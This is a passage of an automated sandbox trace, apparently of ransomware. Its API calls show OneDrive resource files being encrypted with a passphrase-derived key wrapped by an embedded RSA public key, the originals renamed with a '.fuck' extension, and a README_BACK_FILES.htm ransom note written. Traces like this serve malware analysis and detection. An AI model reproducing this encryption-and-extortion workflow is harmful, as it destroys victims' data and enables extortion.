Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.928] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.928] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.928] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.928] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.928] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x2d0, lpOverlapped=0x0) returned 1 [0281.928] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x2d0, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x2e0) returned 1 [0281.928] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x2e0, lpOverlapped=0x0) returned 1 [0281.928] CloseHandle (hObject=0x5d4c) returned 1 [0281.928] CloseHandle (hObject=0x5d80) returned 1 [0281.928] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nl\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nl\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nl\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nl\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0281.935] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nl\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0281.936] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nl\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nl\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0281.938] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nl\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nl\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nl\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nl\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0281.940] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0281.940] CryptDestroyKey (hKey=0x2fc308) returned 1 [0281.940] CryptReleaseContext (hProv=0x2f1ed50, dwFlags=0x0) returned 1 [0281.940] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0281.940] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0281.940] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nl\\readme_back_files.htm")) returned 0xffffffff [0281.941] AreFileApisANSI () returned 1 [0281.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0281.941] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0281.942] GetFileType (hFile=0x5d3c) returned 0x1 [0281.942] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0281.943] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0281.943] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nn-no\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa6c8 [0281.944] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0281.944] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0281.944] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0281.944] GetLastError () returned 0x0 [0281.944] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nn-no\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nn-no\\filesync.localizedresources.dll.mui")) returned 0x20 [0281.944] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nn-no\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0281.945] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nn-no\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nn-no\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d80 [0281.946] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nn-no\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nn-no\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0281.947] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nn-no\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0281.947] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f1ed50) returned 1 [0281.949] CryptCreateHash (in: hProv=0x2f1ed50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0281.950] lstrlenA (lpString="IobgRfrtGtwdLWqndRsiYwqNzMlQm") returned 29 [0281.950] CryptHashData (hHash=0x2fa4c8, pbData=0x28cb738, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0281.950] CryptDeriveKey (in: hProv=0x2f1ed50, Algid=0x6610, hBaseData=0x2fa4c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fc308) returned 1 [0281.950] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0281.950] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0281.950] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f1fa10) returned 1 [0281.950] CryptImportPublicKeyInfo (in: hCryptProv=0x2f1fa10, dwCertEncodingType=0x1, pInfo=0x2f37b20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f37b50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f37b58*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc548) returned 1 [0281.950] CryptEncrypt (in: hKey=0x2fc548, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0281.950] CryptEncrypt (in: hKey=0x2fc548, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1f4c0*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f1f4c0*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0281.951] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f1f4c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f1f4c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0281.953] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.962] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.962] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.964] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.965] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.965] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.965] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.965] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.966] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.966] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.966] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.966] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.966] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.966] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.966] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.966] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.966] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.966] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.966] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.966] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.966] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.967] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.967] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.967] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.967] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.967] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.967] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.967] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.967] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.967] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.967] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.967] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.967] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.968] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.968] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.968] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.968] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.968] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.968] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.968] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.968] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.968] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.969] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.969] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.969] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.969] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.969] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.969] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.969] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.969] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.969] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.969] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.969] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.969] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.969] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, 